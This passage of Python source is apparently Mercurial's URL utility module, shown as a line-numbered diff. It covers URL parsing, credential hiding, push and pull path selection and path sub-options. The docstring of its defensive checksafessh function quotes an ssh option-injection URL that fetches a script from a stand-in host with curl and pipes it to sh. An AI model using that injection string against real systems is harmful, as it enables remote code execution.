107 | 110 | >>> url(b'ssh://joe@x/repo') |
|
108 | 111 | <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> |
|
109 | 112 | |
|
110 | 113 | Query strings and fragments: |
|
111 | 114 | |
|
112 | 115 | >>> url(b'http://host/a?b#c') |
|
113 | 116 | <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> |
|
114 | 117 | >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) |
|
115 | 118 | <url scheme: 'http', host: 'host', path: 'a?b#c'> |
|
116 | 119 | |
|
117 | 120 | Empty path: |
|
118 | 121 | |
|
119 | 122 | >>> url(b'') |
|
120 | 123 | <url path: ''> |
|
121 | 124 | >>> url(b'#a') |
|
122 | 125 | <url path: '', fragment: 'a'> |
|
123 | 126 | >>> url(b'http://host/') |
|
124 | 127 | <url scheme: 'http', host: 'host', path: ''> |
|
125 | 128 | >>> url(b'http://host/#a') |
|
126 | 129 | <url scheme: 'http', host: 'host', path: '', fragment: 'a'> |
|
127 | 130 | |
|
128 | 131 | Only scheme: |
|
129 | 132 | |
|
130 | 133 | >>> url(b'http:') |
|
131 | 134 | <url scheme: 'http'> |
|
132 | 135 | """ |
|
133 | 136 | |
|
134 | 137 | _safechars = b"!~*'()+" |
|
135 | 138 | _safepchars = b"/!~*'()+:\\" |
|
136 | 139 | _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match |
|
137 | 140 | |
|
138 | 141 | def __init__( |
|
139 | 142 | self, |
|
140 | 143 | path: bytes, |
|
141 | 144 | parsequery: bool = True, |
|
142 | 145 | parsefragment: bool = True, |
|
143 | 146 | ) -> None: |
|
144 | 147 | # We slowly chomp away at path until we have only the path left |
|
145 | 148 | self.scheme = self.user = self.passwd = self.host = None |
|
146 | 149 | self.port = self.path = self.query = self.fragment = None |
|
147 | 150 | self._localpath = True |
|
148 | 151 | self._hostport = b'' |
|
149 | 152 | self._origpath = path |
|
150 | 153 | |
|
151 | 154 | if parsefragment and b'#' in path: |
|
152 | 155 | path, self.fragment = path.split(b'#', 1) |
|
153 | 156 | |
|
154 | 157 | # special case for Windows drive letters and UNC paths |
|
155 | 158 | if hasdriveletter(path) or path.startswith(b'\\\\'): |
|
156 | 159 | self.path = path |
|
157 | 160 | return |
|
158 | 161 | |
|
159 | 162 | # For compatibility reasons, we can't handle bundle paths as |
|
160 | 163 | # normal URLS |
|
161 | 164 | if path.startswith(b'bundle:'): |
|
162 | 165 | self.scheme = b'bundle' |
|
163 | 166 | path = path[7:] |
|
164 | 167 | if path.startswith(b'//'): |
|
165 | 168 | path = path[2:] |
|
166 | 169 | self.path = path |
|
167 | 170 | return |
|
168 | 171 | |
|
169 | 172 | if self._matchscheme(path): |
|
170 | 173 | parts = path.split(b':', 1) |
|
171 | 174 | if parts[0]: |
|
172 | 175 | self.scheme, path = parts |
|
173 | 176 | self._localpath = False |
|
174 | 177 | |
|
175 | 178 | if not path: |
|
176 | 179 | path = None |
|
177 | 180 | if self._localpath: |
|
178 | 181 | self.path = b'' |
|
179 | 182 | return |
|
180 | 183 | else: |
|
181 | 184 | if self._localpath: |
|
182 | 185 | self.path = path |
|
183 | 186 | return |
|
184 | 187 | |
|
185 | 188 | if parsequery and b'?' in path: |
|
186 | 189 | path, self.query = path.split(b'?', 1) |
|
187 | 190 | if not path: |
|
188 | 191 | path = None |
|
189 | 192 | if not self.query: |
|
190 | 193 | self.query = None |
|
191 | 194 | |
|
192 | 195 | # // is required to specify a host/authority |
|
193 | 196 | if path and path.startswith(b'//'): |
|
194 | 197 | parts = path[2:].split(b'/', 1) |
|
195 | 198 | if len(parts) > 1: |
|
196 | 199 | self.host, path = parts |
|
197 | 200 | else: |
|
198 | 201 | self.host = parts[0] |
|
199 | 202 | path = None |
|
200 | 203 | if not self.host: |
|
201 | 204 | self.host = None |
|
202 | 205 | # path of file:///d is /d |
|
203 | 206 | # path of file:///d:/ is d:/, not /d:/ |
|
204 | 207 | if path and not hasdriveletter(path): |
|
205 | 208 | path = b'/' + path |
|
206 | 209 | |
|
207 | 210 | if self.host and b'@' in self.host: |
|
208 | 211 | self.user, self.host = self.host.rsplit(b'@', 1) |
|
209 | 212 | if b':' in self.user: |
|
210 | 213 | self.user, self.passwd = self.user.split(b':', 1) |
|
211 | 214 | if not self.host: |
|
212 | 215 | self.host = None |
|
213 | 216 | |
|
214 | 217 | # Don't split on colons in IPv6 addresses without ports |
|
215 | 218 | if ( |
|
216 | 219 | self.host |
|
217 | 220 | and b':' in self.host |
|
218 | 221 | and not ( |
|
219 | 222 | self.host.startswith(b'[') and self.host.endswith(b']') |
|
220 | 223 | ) |
|
221 | 224 | ): |
|
222 | 225 | self._hostport = self.host |
|
223 | 226 | self.host, self.port = self.host.rsplit(b':', 1) |
|
224 | 227 | if not self.host: |
|
225 | 228 | self.host = None |
|
226 | 229 | |
|
227 | 230 | if ( |
|
228 | 231 | self.host |
|
229 | 232 | and self.scheme == b'file' |
|
230 | 233 | and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') |
|
231 | 234 | ): |
|
232 | 235 | raise error.Abort( |
|
233 | 236 | _(b'file:// URLs can only refer to localhost') |
|
234 | 237 | ) |
|
235 | 238 | |
|
236 | 239 | self.path = path |
|
237 | 240 | |
|
238 | 241 | # leave the query string escaped |
|
239 | 242 | for a in ('user', 'passwd', 'host', 'port', 'path', 'fragment'): |
|
240 | 243 | v = getattr(self, a) |
|
241 | 244 | if v is not None: |
|
242 | 245 | setattr(self, a, urlreq.unquote(v)) |
|
243 | 246 | |
|
244 | 247 | def copy(self): |
|
245 | 248 | u = url(b'temporary useless value') |
|
246 | 249 | u.path = self.path |
|
247 | 250 | u.scheme = self.scheme |
|
248 | 251 | u.user = self.user |
|
249 | 252 | u.passwd = self.passwd |
|
250 | 253 | u.host = self.host |
|
251 | 254 | u.port = self.port |
|
252 | 255 | u.query = self.query |
|
253 | 256 | u.fragment = self.fragment |
|
254 | 257 | u._localpath = self._localpath |
|
255 | 258 | u._hostport = self._hostport |
|
256 | 259 | u._origpath = self._origpath |
|
257 | 260 | return u |
|
258 | 261 | |
|
259 | 262 | @encoding.strmethod |
|
260 | 263 | def __repr__(self): |
|
261 | 264 | attrs = [] |
|
262 | 265 | for a in ( |
|
263 | 266 | 'scheme', |
|
264 | 267 | 'user', |
|
265 | 268 | 'passwd', |
|
266 | 269 | 'host', |
|
267 | 270 | 'port', |
|
268 | 271 | 'path', |
|
269 | 272 | 'query', |
|
270 | 273 | 'fragment', |
|
271 | 274 | ): |
|
272 | 275 | v = getattr(self, a) |
|
273 | 276 | if v is not None: |
|
274 | 277 | line = b'%s: %r' |
|
275 | 278 | line %= (pycompat.bytestr(a), pycompat.bytestr(v)) |
|
276 | 279 | attrs.append(line) |
|
277 | 280 | return b'<url %s>' % b', '.join(attrs) |
|
278 | 281 | |
|
279 | 282 | def __bytes__(self): |
|
280 | 283 | r"""Join the URL's components back into a URL string. |
|
281 | 284 | |
|
282 | 285 | Examples: |
|
283 | 286 | |
|
284 | 287 | >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) |
|
285 | 288 | 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' |
|
286 | 289 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) |
|
287 | 290 | 'http://user:pw@host:80/?foo=bar&baz=42' |
|
288 | 291 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) |
|
289 | 292 | 'http://user:pw@host:80/?foo=bar%3dbaz' |
|
290 | 293 | >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) |
|
291 | 294 | 'ssh://user:pw@[::1]:2200//home/joe#' |
|
292 | 295 | >>> bytes(url(b'http://localhost:80//')) |
|
293 | 296 | 'http://localhost:80//' |
|
294 | 297 | >>> bytes(url(b'http://localhost:80/')) |
|
295 | 298 | 'http://localhost:80/' |
|
296 | 299 | >>> bytes(url(b'http://localhost:80')) |
|
297 | 300 | 'http://localhost:80/' |
|
298 | 301 | >>> bytes(url(b'bundle:foo')) |
|
299 | 302 | 'bundle:foo' |
|
300 | 303 | >>> bytes(url(b'bundle://../foo')) |
|
301 | 304 | 'bundle:../foo' |
|
302 | 305 | >>> bytes(url(b'path')) |
|
303 | 306 | 'path' |
|
304 | 307 | >>> bytes(url(b'file:///tmp/foo/bar')) |
|
305 | 308 | 'file:///tmp/foo/bar' |
|
306 | 309 | >>> bytes(url(b'file:///c:/tmp/foo/bar')) |
|
307 | 310 | 'file:///c:/tmp/foo/bar' |
|
308 | 311 | >>> print(url(br'bundle:foo\bar')) |
|
309 | 312 | bundle:foo\bar |
|
310 | 313 | >>> print(url(br'file:///D:\data\hg')) |
|
311 | 314 | file:///D:\data\hg |
|
312 | 315 | """ |
|
313 | 316 | if self._localpath: |
|
314 | 317 | s = self.path |
|
315 | 318 | if self.scheme == b'bundle': |
|
316 | 319 | s = b'bundle:' + s |
|
317 | 320 | if self.fragment: |
|
318 | 321 | s += b'#' + self.fragment |
|
319 | 322 | return s |
|
320 | 323 | |
|
321 | 324 | s = self.scheme + b':' |
|
322 | 325 | if self.user or self.passwd or self.host: |
|
323 | 326 | s += b'//' |
|
324 | 327 | elif self.scheme and ( |
|
325 | 328 | not self.path |
|
326 | 329 | or self.path.startswith(b'/') |
|
327 | 330 | or hasdriveletter(self.path) |
|
328 | 331 | ): |
|
329 | 332 | s += b'//' |
|
330 | 333 | if hasdriveletter(self.path): |
|
331 | 334 | s += b'/' |
|
332 | 335 | if self.user: |
|
333 | 336 | s += urlreq.quote(self.user, safe=self._safechars) |
|
334 | 337 | if self.passwd: |
|
335 | 338 | s += b':' + urlreq.quote(self.passwd, safe=self._safechars) |
|
336 | 339 | if self.user or self.passwd: |
|
337 | 340 | s += b'@' |
|
338 | 341 | if self.host: |
|
339 | 342 | if not (self.host.startswith(b'[') and self.host.endswith(b']')): |
|
340 | 343 | s += urlreq.quote(self.host) |
|
341 | 344 | else: |
|
342 | 345 | s += self.host |
|
343 | 346 | if self.port: |
|
344 | 347 | s += b':' + urlreq.quote(self.port) |
|
345 | 348 | if self.host: |
|
346 | 349 | s += b'/' |
|
347 | 350 | if self.path: |
|
348 | 351 | # TODO: similar to the query string, we should not unescape the |
|
349 | 352 | # path when we store it; the path might contain '%2f' = '/',
|
350 | 353 | # which we should *not* escape. |
|
351 | 354 | s += urlreq.quote(self.path, safe=self._safepchars) |
|
352 | 355 | if self.query: |
|
353 | 356 | # we store the query in escaped form. |
|
354 | 357 | s += b'?' + self.query |
|
355 | 358 | if self.fragment is not None: |
|
356 | 359 | s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) |
|
357 | 360 | return s |
|
358 | 361 | |
|
359 | 362 | __str__ = encoding.strmethod(__bytes__) |
|
360 | 363 | |
|
361 | 364 | def authinfo(self): |
|
362 | 365 | user, passwd = self.user, self.passwd |
|
363 | 366 | try: |
|
364 | 367 | self.user, self.passwd = None, None |
|
365 | 368 | s = bytes(self) |
|
366 | 369 | finally: |
|
367 | 370 | self.user, self.passwd = user, passwd |
|
368 | 371 | if not self.user: |
|
369 | 372 | return (s, None) |
|
370 | 373 | # authinfo[1] is passed to urllib2 password manager, and its |
|
371 | 374 | # URIs must not contain credentials. The host is passed in the |
|
372 | 375 | # URIs list because Python < 2.4.3 uses only that to search for |
|
373 | 376 | # a password. |
|
374 | 377 | return (s, (None, (s, self.host), self.user, self.passwd or b'')) |
|
375 | 378 | |
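A minimal usage sketch of the ``authinfo()`` method above. The module path ``mercurial.utils.urlutil`` and the host/credentials are assumptions for illustration only; the method returns the URL with credentials stripped plus the tuple handed to the urllib2 password manager.

    # hedged sketch, not part of the diff
    from mercurial.utils import urlutil

    u = urlutil.url(b'https://alice:secret@example.com/repo')
    clean, auth = u.authinfo()
    # clean == b'https://example.com/repo'  (credentials stripped)
    # auth  == (None, (clean, b'example.com'), b'alice', b'secret')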
|
376 | 379 | def isabs(self): |
|
377 | 380 | if self.scheme and self.scheme != b'file': |
|
378 | 381 | return True # remote URL |
|
379 | 382 | if hasdriveletter(self.path): |
|
380 | 383 | return True # absolute for our purposes - can't be joined() |
|
381 | 384 | if self.path.startswith(br'\\'): |
|
382 | 385 | return True # Windows UNC path |
|
383 | 386 | if self.path.startswith(b'/'): |
|
384 | 387 | return True # POSIX-style |
|
385 | 388 | return False |
|
386 | 389 | |
|
387 | 390 | def localpath(self) -> bytes: |
|
388 | 391 | if self.scheme == b'file' or self.scheme == b'bundle': |
|
389 | 392 | path = self.path or b'/' |
|
390 | 393 | # For Windows, we need to promote hosts containing drive |
|
391 | 394 | # letters to paths with drive letters. |
|
392 | 395 | if hasdriveletter(self._hostport): |
|
393 | 396 | path = self._hostport + b'/' + self.path |
|
394 | 397 | elif ( |
|
395 | 398 | self.host is not None and self.path and not hasdriveletter(path) |
|
396 | 399 | ): |
|
397 | 400 | path = b'/' + path |
|
398 | 401 | return path |
|
399 | 402 | return self._origpath |
|
400 | 403 | |
|
401 | 404 | def islocal(self): |
|
402 | 405 | '''whether localpath will return something that posixfile can open''' |
|
403 | 406 | return ( |
|
404 | 407 | not self.scheme |
|
405 | 408 | or self.scheme == b'file' |
|
406 | 409 | or self.scheme == b'bundle' |
|
407 | 410 | ) |
|
408 | 411 | |
|
409 | 412 | |
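A small sketch of the path-oriented helpers on ``url`` objects defined above (``isabs``, ``localpath``, ``islocal``); the module path and the example locations are assumptions, not taken from the diff.

    from mercurial.utils import urlutil

    urlutil.url(b'https://example.com/r').isabs()   # True: remote URL
    urlutil.url(b'relative/dir').isabs()            # False: joinable local path
    urlutil.url(b'file:///tmp/foo').localpath()     # expected: b'/tmp/foo'
    urlutil.url(b'/tmp/foo').islocal()              # True: no scheme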
|
410 | 413 | def hasscheme(path: bytes) -> bool: |
|
411 | 414 | return bool(url(path).scheme) # cast to help pytype |
|
412 | 415 | |
|
413 | 416 | |
|
414 | 417 | def hasdriveletter(path: bytes) -> bool: |
|
415 | 418 | return bool(path) and path[1:2] == b':' and path[0:1].isalpha() |
|
416 | 419 | |
|
417 | 420 | |
|
418 | 421 | def urllocalpath(path: bytes) -> bytes: |
|
419 | 422 | return url(path, parsequery=False, parsefragment=False).localpath() |
|
420 | 423 | |
|
421 | 424 | |
|
422 | 425 | def checksafessh(path: bytes) -> None: |
|
423 | 426 | """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
424 | 427 | |
|
425 | 428 | This is a sanity check for ssh urls. ssh will parse the first item as |
|
426 | 429 | an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
427 | 430 | Let's prevent these potentially exploitable urls entirely and warn the
|
428 | 431 | user. |
|
429 | 432 | |
|
430 | 433 | Raises an error.Abort when the url is unsafe. |
|
431 | 434 | """ |
|
432 | 435 | path = urlreq.unquote(path) |
|
433 | 436 | if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): |
|
434 | 437 | raise error.Abort( |
|
435 | 438 | _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) |
|
436 | 439 | ) |
|
437 | 440 | |
|
438 | 441 | |
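A short sketch of the SEC check above: a plain ssh URL passes, while a URL whose host starts with ``-`` is rejected with ``error.Abort``. The host and option payload are invented and the module path is assumed.

    from mercurial import error
    from mercurial.utils import urlutil

    urlutil.checksafessh(b'ssh://user@example.com/repo')   # accepted, returns None
    try:
        urlutil.checksafessh(b'ssh://-oProxyCommand=touch${IFS}owned/repo')
    except error.Abort:
        print('rejected potentially unsafe ssh url')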
|
439 | 442 | def hidepassword(u: bytes) -> bytes: |
|
440 | 443 | '''hide user credential in a url string''' |
|
441 | 444 | u = url(u) |
|
442 | 445 | if u.passwd: |
|
443 | 446 | u.passwd = b'***' |
|
444 | 447 | return bytes(u) |
|
445 | 448 | |
|
446 | 449 | |
|
447 | 450 | def removeauth(u: bytes) -> bytes: |
|
448 | 451 | '''remove all authentication information from a url string''' |
|
449 | 452 | u = url(u) |
|
450 | 453 | u.user = u.passwd = None |
|
451 | 454 | return bytes(u) |
|
452 | 455 | |
|
453 | 456 | |
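A hedged sketch of the two credential helpers above (module path and credentials are illustrative assumptions):

    from mercurial.utils import urlutil

    urlutil.hidepassword(b'https://alice:secret@example.com/repo')
    # -> b'https://alice:***@example.com/repo'
    urlutil.removeauth(b'https://alice:secret@example.com/repo')
    # -> b'https://example.com/repo'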
|
454 | 457 | def list_paths(ui, target_path=None): |
|
455 | 458 | """list all the (name, path) pairs in the passed ui"""
|
456 | 459 | result = [] |
|
457 | 460 | if target_path is None: |
|
458 | 461 | for name, paths in sorted(ui.paths.items()): |
|
459 | 462 | for p in paths: |
|
460 | 463 | result.append((name, p)) |
|
461 | 464 | |
|
462 | 465 | else: |
|
463 | 466 | for path in ui.paths.get(target_path, []): |
|
464 | 467 | result.append((target_path, path)) |
|
465 | 468 | return result |
|
466 | 469 | |
|
467 | 470 | |
|
468 | 471 | def try_path(ui, url): |
|
469 | 472 | """try to build a path from a url |
|
470 | 473 | |
|
471 | 474 | Return None if no Path could be built.
|
472 | 475 | """ |
|
473 | 476 | try: |
|
474 | 477 | # we pass the ui instance as warnings might need to be issued
|
475 | 478 | return path(ui, None, rawloc=url) |
|
476 | 479 | except ValueError: |
|
477 | 480 | return None |
|
478 | 481 | |
|
479 | 482 | |
|
480 | 483 | def get_push_paths(repo, ui, dests): |
|
481 | 484 | """yields all the `path` objects selected as push destinations by `dests`"""
|
482 | 485 | if not dests: |
|
483 | 486 | if b'default-push' in ui.paths: |
|
484 | 487 | for p in ui.paths[b'default-push']: |
|
485 | 488 | yield p.get_push_variant() |
|
486 | 489 | elif b'default' in ui.paths: |
|
487 | 490 | for p in ui.paths[b'default']: |
|
488 | 491 | yield p.get_push_variant() |
|
489 | 492 | else: |
|
490 | 493 | raise error.ConfigError( |
|
491 | 494 | _(b'default repository not configured!'), |
|
492 | 495 | hint=_(b"see 'hg help config.paths'"), |
|
493 | 496 | ) |
|
494 | 497 | else: |
|
495 | 498 | for dest in dests: |
|
496 | 499 | if dest in ui.paths: |
|
497 | 500 | for p in ui.paths[dest]: |
|
498 | 501 | yield p.get_push_variant() |
|
499 | 502 | else: |
|
500 | 503 | path = try_path(ui, dest) |
|
501 | 504 | if path is None: |
|
502 | 505 | msg = _(b'repository %s does not exist') |
|
503 | 506 | msg %= dest |
|
504 | 507 | raise error.RepoError(msg) |
|
505 | 508 | yield path.get_push_variant() |
|
506 | 509 | |
|
507 | 510 | |
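A sketch of resolving push destinations with the helper above. The repository location and its configured ``[paths]`` entries are assumptions; with no explicit destinations, ``default-push`` or ``default`` from the configuration is used.

    from mercurial import hg, ui as uimod
    from mercurial.utils import urlutil

    u = uimod.ui.load()
    repo = hg.repository(u, b'/tmp/repo')   # assumed existing repository
    for p in urlutil.get_push_paths(repo, repo.ui, dests=[]):
        print(p.rawloc, p.is_push_variant)  # push variants of the configured paths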
|
508 | 511 | def get_pull_paths(repo, ui, sources): |
|
509 | 512 | """yields all the `path` objects selected as pull sources by `sources`"""
|
510 | 513 | if not sources: |
|
511 | 514 | sources = [b'default'] |
|
512 | 515 | for source in sources: |
|
513 | 516 | if source in ui.paths: |
|
514 | 517 | for p in ui.paths[source]: |
|
515 | 518 | yield p |
|
516 | 519 | else: |
|
517 | 520 | p = path(ui, None, source, validate_path=False) |
|
518 | 521 | yield p |
|
519 | 522 | |
|
520 | 523 | |
|
521 | 524 | def get_unique_push_path(action, repo, ui, dest=None): |
|
522 | 525 | """return a unique `path` or abort if multiple are found |
|
523 | 526 | |
|
524 | 527 | This is useful for commands and actions that do not support multiple

525 | 528 | destinations (yet).
|
526 | 529 | |
|
527 | 530 | The `action` parameter will be used for the error message. |
|
528 | 531 | """ |
|
529 | 532 | if dest is None: |
|
530 | 533 | dests = [] |
|
531 | 534 | else: |
|
532 | 535 | dests = [dest] |
|
533 | 536 | dests = list(get_push_paths(repo, ui, dests)) |
|
534 | 537 | if len(dests) != 1: |
|
535 | 538 | if dest is None: |
|
536 | 539 | msg = _( |
|
537 | 540 | b"default path points to %d urls while %s only supports one" |
|
538 | 541 | ) |
|
539 | 542 | msg %= (len(dests), action) |
|
540 | 543 | else: |
|
541 | 544 | msg = _(b"path points to %d urls while %s only supports one: %s") |
|
542 | 545 | msg %= (len(dests), action, dest) |
|
543 | 546 | raise error.Abort(msg) |
|
544 | 547 | return dests[0] |
|
545 | 548 | |
|
546 | 549 | |
|
547 | 550 | def get_unique_pull_path_obj(action, ui, source=None): |
|
548 | 551 | """return a unique `path` or abort if multiple are found
|
549 | 552 | |
|
550 | 553 | This is useful for commands and actions that do not support multiple

551 | 554 | destinations (yet).
|
552 | 555 | |
|
553 | 556 | The `action` parameter will be used for the error message. |
|
554 | 557 | |
|
555 | 558 | note: Ideally, this function would be called `get_unique_pull_path` to |
|
556 | 559 | mirror the `get_unique_push_path`, but the name was already taken. |
|
557 | 560 | """ |
|
558 | 561 | sources = [] |
|
559 | 562 | if source is not None: |
|
560 | 563 | sources.append(source) |
|
561 | 564 | |
|
562 | 565 | pull_paths = list(get_pull_paths(None, ui, sources=sources)) |
|
563 | 566 | path_count = len(pull_paths) |
|
564 | 567 | if path_count != 1: |
|
565 | 568 | if source is None: |
|
566 | 569 | msg = _( |
|
567 | 570 | b"default path points to %d urls while %s only supports one" |
|
568 | 571 | ) |
|
569 | 572 | msg %= (path_count, action) |
|
570 | 573 | else: |
|
571 | 574 | msg = _(b"path points to %d urls while %s only supports one: %s") |
|
572 | 575 | msg %= (path_count, action, source) |
|
573 | 576 | raise error.Abort(msg) |
|
574 | 577 | return pull_paths[0] |
|
575 | 578 | |
|
576 | 579 | |
|
577 | 580 | def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): |
|
578 | 581 | """return a unique `(url, branch)` or abort if multiple are found |
|
579 | 582 | |
|
580 | 583 | See `get_unique_pull_path_obj` for details. |
|
581 | 584 | """ |
|
582 | 585 | path = get_unique_pull_path_obj(action, ui, source=source) |
|
583 | 586 | return parseurl(path.rawloc, default_branches) |
|
584 | 587 | |
|
585 | 588 | |
|
586 | 589 | def get_clone_path_obj(ui, source): |
|
587 | 590 | """return the `path` selected as clone source, or None if ``source`` is empty"""
|
588 | 591 | if source == b'': |
|
589 | 592 | return None |
|
590 | 593 | return get_unique_pull_path_obj(b'clone', ui, source=source) |
|
591 | 594 | |
|
592 | 595 | |
|
593 | 596 | def get_clone_path(ui, source, default_branches=None): |
|
594 | 597 | """return the `(origsource, url, branch)` selected as clone source""" |
|
595 | 598 | path = get_clone_path_obj(ui, source) |
|
596 | 599 | if path is None: |
|
597 | 600 | return (b'', b'', (None, default_branches)) |
|
598 | 601 | if default_branches is None: |
|
599 | 602 | default_branches = [] |
|
600 | 603 | branches = (path.branch, default_branches) |
|
601 | 604 | return path.rawloc, path.loc, branches |
|
602 | 605 | |
|
603 | 606 | |
|
604 | 607 | def parseurl(path, branches=None): |
|
605 | 608 | '''parse url#branch, returning (url, (branch, branches))''' |
|
606 | 609 | u = url(path) |
|
607 | 610 | branch = None |
|
608 | 611 | if u.fragment: |
|
609 | 612 | branch = u.fragment |
|
610 | 613 | u.fragment = None |
|
611 | 614 | return bytes(u), (branch, branches or []) |
|
612 | 615 | |
|
613 | 616 | |
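A quick sketch of ``parseurl`` splitting the ``#branch`` fragment; the URL and branch names are invented and the module path is assumed.

    from mercurial.utils import urlutil

    loc, branch_info = urlutil.parseurl(b'https://example.com/repo#stable', [b'default'])
    # loc         == b'https://example.com/repo'
    # branch_info == (b'stable', [b'default'])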
|
614 | 617 | class paths(dict): |
|
615 | 618 | """Represents a collection of paths and their configs. |
|
616 | 619 | |
|
617 | 620 | Data is initially derived from ui instances and the config files they have |
|
618 | 621 | loaded. |
|
619 | 622 | """ |
|
620 | 623 | |
|
621 | 624 | def __init__(self, ui): |
|
622 | 625 | dict.__init__(self) |
|
623 | 626 | |
|
624 | 627 | home_path = os.path.expanduser(b'~') |
|
625 | 628 | |
|
626 | 629 | for name, value in ui.configitems(b'paths', ignoresub=True): |
|
627 | 630 | # No location is the same as not existing. |
|
628 | 631 | if not value: |
|
629 | 632 | continue |
|
630 | 633 | _value, sub_opts = ui.configsuboptions(b'paths', name) |
|
631 | 634 | s = ui.configsource(b'paths', name) |
|
632 | 635 | root_key = (name, value, s) |
|
633 | 636 | root = ui._path_to_root.get(root_key, home_path) |
|
634 | 637 | |
|
635 | 638 | multi_url = sub_opts.get(b'multi-urls') |
|
636 | 639 | if multi_url is not None and stringutil.parsebool(multi_url): |
|
637 | 640 | base_locs = stringutil.parselist(value) |
|
638 | 641 | else: |
|
639 | 642 | base_locs = [value] |
|
640 | 643 | |
|
641 | 644 | paths = [] |
|
642 | 645 | for loc in base_locs: |
|
643 | 646 | loc = os.path.expandvars(loc) |
|
644 | 647 | loc = os.path.expanduser(loc) |
|
645 | 648 | if not hasscheme(loc) and not os.path.isabs(loc): |
|
646 | 649 | loc = os.path.normpath(os.path.join(root, loc)) |
|
647 | 650 | p = path(ui, name, rawloc=loc, suboptions=sub_opts) |
|
648 | 651 | paths.append(p) |
|
649 | 652 | self[name] = paths |
|
650 | 653 | |
|
651 | 654 | for name, old_paths in sorted(self.items()): |
|
652 | 655 | new_paths = [] |
|
653 | 656 | for p in old_paths: |
|
654 | 657 | new_paths.extend(_chain_path(p, ui, self)) |
|
655 | 658 | self[name] = new_paths |
|
656 | 659 | |
|
657 | 660 | |
|
658 | 661 | _pathsuboptions: "Dict[bytes, Tuple[str, Callable]]" = {} |
|
659 | 662 | # a dictionary of methods that can be used to format a sub-option value
|
660 | 663 | path_suboptions_display = {} |
|
661 | 664 | |
|
662 | 665 | |
|
663 | 666 | def pathsuboption(option: bytes, attr: str, display=pycompat.bytestr): |
|
664 | 667 | """Decorator used to declare a path sub-option. |
|
665 | 668 | |
|
666 | 669 | Arguments are the sub-option name and the attribute it should set on |
|
667 | 670 | ``path`` instances. |
|
668 | 671 | |
|
669 | 672 | The decorated function will receive as arguments a ``ui`` instance, |
|
670 | 673 | ``path`` instance, and the string value of this option from the config. |
|
671 | 674 | The function should return the value that will be set on the ``path`` |
|
672 | 675 | instance. |
|
673 | 676 | |
|
674 | 677 | The optional `display` argument is a function that can be used to format |
|
675 | 678 | the value when displayed to the user (like in `hg paths` for example). |
|
676 | 679 | |
|
677 | 680 | This decorator can be used to perform additional verification of |
|
678 | 681 | sub-options and to change the type of sub-options. |
|
679 | 682 | """ |
|
680 | 683 | if isinstance(attr, bytes): |
|
681 | 684 | msg = b'pathsuboption takes `str` as "attr" argument, not `bytes`'
|
682 | 685 | raise TypeError(msg) |
|
683 | 686 | |
|
684 | 687 | def register(func): |
|
685 | 688 | _pathsuboptions[option] = (attr, func) |
|
686 | 689 | path_suboptions_display[option] = display |
|
687 | 690 | return func |
|
688 | 691 | |
|
689 | 692 | return register |
|
690 | 693 | |
|
691 | 694 | |
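A hypothetical registration using the decorator above. The ``note`` sub-option name and attribute are invented purely to illustrate the signature; registering it mutates the module-level sub-option tables for real.

    from mercurial.utils import urlutil

    @urlutil.pathsuboption(b'note', 'note')
    def note_option(ui, path, value):
        # receives the raw config bytes; the return value is stored on the
        # path instance under the 'note' attribute (None means "unset")
        return value or None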
|
692 | 695 | def display_bool(value): |
|
693 | 696 | """display a boolean suboption back to the user""" |
|
694 | 697 | return b'yes' if value else b'no' |
|
695 | 698 | |
|
696 | 699 | |
|
697 | 700 | @pathsuboption(b'pushurl', '_pushloc') |
|
698 | 701 | def pushurlpathoption(ui, path, value): |
|
699 | 702 | u = url(value) |
|
700 | 703 | # Actually require a URL. |
|
701 | 704 | if not u.scheme: |
|
702 | 705 | msg = _(b'(paths.%s:pushurl not a URL; ignoring: "%s")\n') |
|
703 | 706 | msg %= (path.name, value) |
|
704 | 707 | ui.warn(msg) |
|
705 | 708 | return None |
|
706 | 709 | |
|
707 | 710 | # Don't support the #foo syntax in the push URL to declare branch to |
|
708 | 711 | # push. |
|
709 | 712 | if u.fragment: |
|
710 | 713 | ui.warn( |
|
711 | 714 | _( |
|
712 | 715 | b'("#fragment" in paths.%s:pushurl not supported; ' |
|
713 | 716 | b'ignoring)\n' |
|
714 | 717 | ) |
|
715 | 718 | % path.name |
|
716 | 719 | ) |
|
717 | 720 | u.fragment = None |
|
718 | 721 | |
|
719 | 722 | return bytes(u) |
|
720 | 723 | |
|
721 | 724 | |
|
722 | 725 | @pathsuboption(b'pushrev', 'pushrev') |
|
723 | 726 | def pushrevpathoption(ui, path, value): |
|
724 | 727 | return value |
|
725 | 728 | |
|
726 | 729 | |
|
727 | 730 | SUPPORTED_BOOKMARKS_MODES = { |
|
728 | 731 | b'default', |
|
729 | 732 | b'mirror', |
|
730 | 733 | b'ignore', |
|
731 | 734 | } |
|
732 | 735 | |
|
733 | 736 | |
|
734 | 737 | @pathsuboption(b'bookmarks.mode', 'bookmarks_mode') |
|
735 | 738 | def bookmarks_mode_option(ui, path, value): |
|
736 | 739 | if value not in SUPPORTED_BOOKMARKS_MODES: |
|
737 | 740 | path_name = path.name |
|
738 | 741 | if path_name is None: |
|
739 | 742 | # this is an "anonymous" path, config comes from the global one |
|
740 | 743 | path_name = b'*' |
|
741 | 744 | msg = _(b'(paths.%s:bookmarks.mode has unknown value: "%s")\n') |
|
742 | 745 | msg %= (path_name, value) |
|
743 | 746 | ui.warn(msg) |
|
744 | 747 | if value == b'default': |
|
745 | 748 | value = None |
|
746 | 749 | return value |
|
747 | 750 | |
|
748 | 751 | |
|
749 | 752 | DELTA_REUSE_POLICIES = { |
|
750 | 753 | b'default': None, |
|
751 | 754 | b'try-base': revlog_constants.DELTA_BASE_REUSE_TRY, |
|
752 | 755 | b'no-reuse': revlog_constants.DELTA_BASE_REUSE_NO, |
|
